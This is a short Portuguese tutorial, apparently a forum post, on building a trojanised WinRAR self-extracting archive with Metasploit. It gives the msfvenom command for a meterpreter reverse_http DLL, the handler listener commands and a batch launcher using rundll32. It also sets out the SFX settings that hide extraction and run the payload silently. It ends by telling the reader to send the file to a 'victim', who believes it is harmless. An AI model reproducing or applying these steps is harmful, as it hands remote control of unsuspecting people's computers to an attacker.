Metasploit – Backdoor em arquivos .RAR

Descrição

Primeiramente vamos criar nosso payload

Código: Selecionar todos

msfvenom --plataform windows --arch x86 -p windows/meterpreter/reverse_http LHOST=seuhost LPORT=suaporta -f dll > inject.dll

Abra o console

Código: Selecionar todos

msfconsole

Seleciona o exploit

Código: Selecionar todos

use exploit/multi/handler

Sete o payload

Código: Selecionar todos

set PAYLOAD windows/meterpreter/reverse_http

Sete o host

Código: Selecionar todos

set LHOST seuhost

Sete a porta

Código: Selecionar todos

set LPORT suaporta

Vamos rodar agora para ficar esperando a conexão

Código: Selecionar todos

exploit -j

Abra um arquivo bat e coloque as segunte linhas

Código: Selecionar todos

@echo off
echo [*] Aguarde por favor.....
rundll32.exe inject.dll.main
exit

Salve o arquivo com o nome que quiser

Nessa parte será necessário um windows ou então um programa de emulação de programas do windows chamado de wine
Na maquina com windows tenha instalado o winrar e mova para a máquina os dois arquivos, o payload que é o inejct.dll e o bat que é o nome que vocês escolheram
Selecione os dois e clique em “Adicionar para o arquivo”, vamos compactar eles
Quando abrir a tela do winrar vá onde está escrito “Opções de Compressão” e marque a caixinha onde tá escrito “Criar arquivo SFX”
Depois vá na aba “Avançado” e em “Opções SFX….”
Vamos em configurações, onde está escrito “executar depois da extração” coloque a linha abaixo

Código: Selecionar todos

nomedoseubat.bat

Em “Metódos” procure por “Modo silencioso” e selecione a opção “Ocultar tudo”
Vamos em “Atualizar” e em “Metódo de substituição” e selecione a opção “Ignorar arquivos existentes”
Após isso de ok em tudo e vai criar o arquivo em sua área de trabalho
Esse arquivo você enviará para sua vítima e ela vai abrir achando que é winrar, após ela executar uma sessão será criada no metasploit